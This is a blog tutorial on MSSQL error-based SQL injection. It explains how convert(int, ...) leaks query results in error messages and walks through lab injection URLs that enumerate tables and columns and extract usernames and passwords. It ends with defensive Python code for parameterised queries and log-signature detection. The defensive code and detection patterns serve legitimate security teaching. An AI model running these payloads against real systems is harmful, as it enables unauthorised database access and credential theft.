saulGoodman
A public account focused on red team offensive and defensive research
Hands-on notes on Microsoft SQL Server error-based injection
Brief introduction
Today I am mainly sharing error-based SQL injection. Most articles online only list formula-like statements, and do not explain why this function is used, or why using it produces an error that makes SQL injection possible.
The convert() function
CONVERT() is a general-purpose function that converts a date to a new data type.
Syntax:
CONVERT(data_type(length),data_to_be_converted,style)
Notes:
data_type(length): the target data type to convert to (with an optional length).
data_to_be_converted: the value that needs to be converted.
style: specifies the output format of the date/time.
Example:
CONVERT(VARCHAR(19),GETDATE())
CONVERT(VARCHAR(10),GETDATE(),110)
CONVERT(VARCHAR(11),GETDATE(),106)
CONVERT(VARCHAR(24),GETDATE(),113)
Results similar to:
Dec 29 2008 11:45 PM
12-29-2008
29 Dec 08
29 Dec 2008 16:25:46.635
Principle
Take convert(int,@@version): the convert function first executes the SQL query given as its second parameter, then tries to convert the query result to the int type. However, because the result of the SQL query is of varchar type, the requested conversion cannot be performed, so the convert function throws a SQL Server error message saying that "the SQL query result" cannot be converted to the "int" type. In this way the attacker obtains the result of the SQL query from the error message.
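To make the defensive side of this principle concrete, here is an added example (written for this write-up, not code from the original post) showing the two things that close this channel: typing and binding the id parameter so the input is never parsed as SQL, and never echoing the driver's error text back to the client. The table and column names, the two payloads and the sample error string are constructed; the error wording follows the shape of SQL Server message 245, which is what this technique relies on being returned.

```python
import logging
import re
from typing import Tuple

log = logging.getLogger("app")

# Constructed payloads taken from the post's walkthrough: the first is dropped
# straight into id=, the second keeps id=1 and appends a condition.
PAYLOADS = [
    "convert(int,@@version)",
    "1 and 1=(convert(int,@@version))",
]

# Constructed sample of what the database driver hands back; the wording is the
# shape of SQL Server message 245 that this technique relies on seeing.
SAMPLE_DB_ERROR = (
    "Conversion failed when converting the nvarchar value "
    "'Microsoft SQL Server (constructed version banner)' to data type int."
)
CONVERSION_ERROR = re.compile(
    r"Conversion failed when converting the \w+ value '(?P<leaked>.*?)' to data type \w+\.",
    re.S,
)


def build_query_vulnerable(raw_id: str) -> str:
    """The pattern the post relies on: the raw parameter is spliced into the SQL
    text, so a convert(int, ...) in the parameter becomes part of the statement."""
    return "select id, username from users where id=" + raw_id


class InvalidParameter(ValueError):
    """Raised when a request parameter fails strict type validation."""


def parse_id(raw_id: str) -> int:
    """Accept an optional sign and up to ten digits, nothing else. The value is
    rejected here, before a statement is ever built."""
    cleaned = raw_id.strip()
    if not re.fullmatch(r"-?\d{1,10}", cleaned):
        raise InvalidParameter(f"id must be an integer, got {raw_id!r}")
    return int(cleaned)


def build_query_hardened(raw_id: str) -> Tuple[str, Tuple[int, ...]]:
    """Typed, parameterised form: the statement text is constant and the value is
    bound separately (pyodbc-style '?' marker), so the input is never parsed as SQL."""
    return ("select id, username from users where id=?", (parse_id(raw_id),))


def rejects(raw_id: str) -> bool:
    """True when the hardened path refuses the parameter."""
    try:
        build_query_hardened(raw_id)
    except InvalidParameter:
        return True
    return False


def is_conversion_error(db_error_text: str) -> bool:
    """Recognise the conversion-failure message that carries the query result."""
    return CONVERSION_ERROR.search(db_error_text) is not None


def client_error_response(db_error_text: str) -> dict:
    """Second defence: keep the driver's text in the server log, flag the
    conversion case as a probable probe, and give the client a generic message."""
    if is_conversion_error(db_error_text):
        log.warning("conversion error, possible error-based injection probe: %s", db_error_text)
    else:
        log.error("database error: %s", db_error_text)
    return {"status": 500, "body": "An internal error occurred."}


if __name__ == "__main__":
    for p in PAYLOADS:
        print("vulnerable ->", build_query_vulnerable(p))
        print("hardened   ->", "rejected" if rejects(p) else build_query_hardened(p))
    print(client_error_response(SAMPLE_DB_ERROR))
```

The hardened builder rejects both payloads from the post before any statement exists, and the generic error response removes the leak channel even if some other query path in the application still breaks.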
There are many functions that satisfy this condition:
convert()
file_name()
db_name()
col_name()
filegroup_name()
object_name()
schema_name()
type_name()
cast()
Injection process
Basic information queries
convert(int,@@version)      -- get version information
convert(int,db_name())      -- database name
convert(int,user)           -- current user name
convert(int,@@SERVERNAME)   -- get information about the server host
Obtain version information
http://192.168.159.135:8080/get.aspx?id=convert(int,@@version)
Note that here we put the function directly after id=, because the query id=1 is an integer (int), while the version information returned by our convert(int,@@version) is a string type, so it raises an error and the version information is exposed!
Alternatively, this statement achieves the same result:
http://192.168.159.135:8080/get.aspx?id=1 and 1=(convert(int,@@version))
Get the table names of the current database
CONVERT(int,(select top 1 table_name from information_schema.columns))
http://192.168.159.135:8080/get.aspx?id=CONVERT(int,(select top 1 table_name from information_schema.columns))
The table name we obtain from the site's current database is: users!
Get the column names
convert(int,(select top 1 COLUMN_NAME from information_schema.columns where TABLE_NAME=cast(<hex-encoded table name> as varchar)))
http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 COLUMN_NAME from information_schema.columns where TABLE_NAME=cast(0x7573657273 as varchar)))
So we get the first column name: id!
To get the second column name, we append a condition: and COLUMN_NAME != 'id'
http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 COLUMN_NAME from information_schema.columns where TABLE_NAME=cast(0x7573657273 as varchar) and COLUMN_NAME != 'id'))
So we get the second column name: username!
To get the third one, and so on, append another condition: and COLUMN_NAME != 'username'
http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 COLUMN_NAME from information_schema.columns where TABLE_NAME=cast(0x7573657273 as varchar) and COLUMN_NAME != 'id' and COLUMN_NAME != 'username'))
So we get the third column name: password!
Retrieve data
From the steps above we obtained the site's table name: users, and its column names: id, username, password. Obviously the account and password are in the username and password columns, so now we can retrieve the data:
convert(int,(select top 1 <column name> from <table name>))
http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 username from users))
This gets the first data item in the username column: saul!
If you want the second data item in username, append a condition: where username!='saul'
http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 username from users where username!='saul'))
This gets the second data item in username! To get the third, and so on!
Now we have obtained two usernames: saul and admin! So next we will get their passwords!
http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 password from users))
This gets the first value in the password column: saul520!
To get the next one, append a where condition: where password!='saul520'
http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 password from users where password!='saul520'))
This gets the second password value!
At this point, the MSSQL error-based injection walkthrough stops here!
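As a closing added example (written for this write-up, not code from the original post), the signatures used throughout the walkthrough above can be matched on the server side. The script scans constructed IIS/W3C-style access-log lines for the error-based patterns (convert or cast to int, @@ server variables, information_schema enumeration, hex-literal casts, top 1 sub-selects), URL-decodes the query string first, and renders hex literals as text so the analyst can see which table a probe named. The log format, client addresses and every line are constructed for the example.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote_plus

# Constructed IIS/W3C-style access log: date time client-ip method uri-stem uri-query status.
SAMPLE_LOG = """\
2024-01-01 10:00:01 10.0.0.5 GET /get.aspx id=1 200
2024-01-01 10:00:02 10.0.0.9 GET /get.aspx id=convert(int,@@version) 500
2024-01-01 10:00:03 10.0.0.9 GET /get.aspx id=1+and+1%3D(convert(int,@@version)) 500
2024-01-01 10:00:04 10.0.0.9 GET /get.aspx id=convert(int,(select+top+1+COLUMN_NAME+from+information_schema.columns+where+TABLE_NAME%3Dcast(0x7573657273+as+varchar))) 500
2024-01-01 10:00:05 10.0.0.7 GET /get.aspx id=42 200
"""

# Signatures drawn from the techniques in the post, matched case-insensitively on
# the URL-decoded query string.
SIGNATURES = {
    "convert_to_int": re.compile(r"\b(?:convert|cast)\s*\(\s*int\b", re.I),
    "server_variable": re.compile(r"@@\w+"),
    "schema_enum": re.compile(r"information_schema\.", re.I),
    "hex_literal_cast": re.compile(r"cast\s*\(\s*0x[0-9a-f]+\s+as\s+n?varchar", re.I),
    "top1_subselect": re.compile(r"\(\s*select\s+top\s+1\b", re.I),
}

HEX_LITERAL = re.compile(r"0x([0-9a-f]{2,})", re.I)


def decode_hex_literals(text: str) -> List[str]:
    """Render 0x... literals as text so the analyst can see the table or column the
    probe names (the post's 0x7573657273 is 'users')."""
    decoded = []
    for hex_digits in HEX_LITERAL.findall(text):
        try:
            decoded.append(bytes.fromhex(hex_digits).decode("ascii"))
        except (ValueError, UnicodeDecodeError):
            decoded.append("<non-ascii>")
    return decoded


def parse_line(line: str) -> Optional[Dict]:
    """Split one log line into the fields used here; returns None for malformed lines."""
    parts = line.split()
    if len(parts) != 7:
        return None
    _date, _time, ip, _method, stem, query, status = parts
    return {"ip": ip, "path": stem, "query": unquote_plus(query), "status": int(status)}


def scan_log(text: str) -> List[Dict]:
    """Return one finding per request that matches at least one signature."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = [name for name, rx in SIGNATURES.items() if rx.search(rec["query"])]
        if hits:
            findings.append({
                "ip": rec["ip"],
                "status": rec["status"],
                "signatures": hits,
                "decoded_literals": decode_hex_literals(rec["query"]),
            })
    return findings


def suspicious_sources(findings: List[Dict]) -> Dict[str, int]:
    """Count findings per client address, a simple way to rank who to look at first."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for r in results:
        print(r)
    print("by source:", suspicious_sources(results))
```

Pairing the signature hits with the 500 status is the useful part in practice: a request that carries a conversion signature and is answered with a server error is exactly the combination the walkthrough depends on, and it is what an alert should key on.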